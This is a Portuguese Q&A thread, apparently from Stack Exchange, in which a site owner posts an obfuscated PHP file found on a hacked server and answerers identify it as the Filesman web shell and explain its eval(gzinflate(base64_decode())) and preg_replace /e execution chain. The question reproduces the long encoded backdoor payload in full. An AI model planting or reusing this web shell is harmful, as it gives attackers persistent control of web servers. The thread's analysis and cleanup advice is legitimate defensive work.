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'\x29\x29\x29\x3B",".");?>
```

Alguem tem ideia da utilidade disso?

Comment: Creio que seja esse o motivo de o modificador `e` ter sido depreciado em versões mais novas do PHP

Comment: Esse código abre um web shell feito em php, e a senha que ele colocou foi = "kiddiedemierda" =)

Answer (score 42, accepted):

O trecho de código efetivamente responsável pelo "roubo" dos dados é a última linha. Basicamente é um `preg_replace` contendo a *flag* `e`, o que significa que eventuais funções dentro da expressão regular deverão ser executados. E o código a ser executado está dentro daquela *hash* enorme, que eu decompilei e coloquei [nesse link aqui](http://pastebin.com/7u38G9pP).

Esse código fica dentro das funções `eval(gzinflate(base64_decode($hash)))` que está representado pelos caracteres codificados logo no início da hash.

Resumindo: a função `preg_replace` executa um `eval` de um código malicioso (que está no link acima) que é descomprimido por meio das funções `gzinflate` e `base64_decode`.

Comment: Bom, esse arquivo pode ser executado externamente ou precisa ser primeiramente inserido dentro da ftp do site?

Comment: @RodrigoBorth Ele pode ser executado externamente, mas o *cracker* (termo certo, ao invés de *hacker*) antes de mais nada tem que colocar o arquivo de alguma maneira dentro do servidor. Provavelmente ele fez isso via FTP.

Comment: então ele ou conseguiu invadir a FTP ou então contratou uma hospedagem e por acaso o servidor dessa hospedagem era o mesmo que o meu site :(

Comment: `preg_replace` executa o `eval` por causa do modificador `e` :)

Answer (score 23):

O Filesman é um backdoor ou um shell como costumam chamar. O objetivo destes é deixar a "porta dos fundos" sempre aberta pra quando o hacker precisar desse sistema. Se você ainda não tirou este arquivo do seu servidor é importante fazê-lo.

Sobre como ele acessou o Painel da Kinghost, não tem nada nesse código que prove o que você falou.

Comment: Eu não tenho como postar a prova, mas depois de conversar com o suporte da kinghost eles confirmaram que o painel deles que foi hackeado e as senhas alteradas, ja excluí os arquivos e alterei a senha do painel novamente...

Comment: Obrigado, esta informação é realmente importante. Então nesse caso você consegue afirmar com certeza que foi uma falha no código e depois acessaram sua conta na kinghost ou simplesmente começaram pela kinghost e terminaram por infectar seu site?

Comment: Dessa vez começaram pela Kinghost e terminaram no meu site, provavelmente não foi o único, mas até agora foi o único que vimos

Comment: Se a pessoa que fez isso quisesse ela poderia ter simplesmente ejetado sql no site, mas ela não fez isso, varri o banco de dados atras de alguma informação mas não achei nada, depois conversamos com o suporte da kinghost e o mesmo alegou que a maior possibilidade era que o painel deles "painel.dominio.com.br" que havia sido hackeado ja que os ips de acesso a ftp estavam bloqueados e não havia nenhum tipo de sql injetado no site

Comment: É que são duas coisas diferentes. No caso de injetar SQL, o invasor tem como objetivo invadir o seu sistema, injetando código malicioso pelo SQL. o Filesman ali é um backdoor ou seja, já havia ocorrido a invasão e o atacante só deixou uma forma de sempre se conectar. Você pode olhar a resposta do rodigorigotti, onde o código é exibido sem estar ofuscado.

Comment: Ou seja, ele precisou acessar o servidor de um jeito ou de outro pra deixar o arquivo la e ter acessoa sempre...

Comment: Exatamente, primeiro ele ganha acesso, depois mantém acesso.

Answer (score 5):

O hacker conseguiu enfiar o código de qualquer maneira no seu servidor e ele passa a funcionar, abre umas portas e de seguida terá fácil acesso aos conteúdos do teu servidor.

Segundo o meu antivírus o código é um trojan. O engraçado é que ele pensa que a própria pagina em que está a questão é um vírus, e como tal o meu antivírus reconhece esta página como sendo um vírus trojan.

> Um cavalo de Tróia (em inglês Trojan horse) é um malware (programa malicioso) que age como a história do Cavalo de Troia,
>       entrando no computador e liberando uma porta para uma possível invasão e é fácil de ser enviado,
>       é só clicar no ID do computador e enviar para qualquer outro computador.

[Cavalo de troia (computação) – Wikipédia, a enciclopédia livre](http://pt.wikipedia.org/wiki/Cavalo_de_troia_(computa%C3%A7%C3%A3o))

O link do avast é grande demais:
http://goo.gl/o7TV5l ou http://goo.gl/o7TV5l+ (se não confiar no link, assim o Google mostra os dados do mesmo).

Recomendo que os moderadores da StackExchange verificam está situação, que provavelmente não é nada.

[image]

[image]

Comment: Código em quarentena? Não entendi o que você quis dizer.

Comment: Esquece provavelmente não é nada...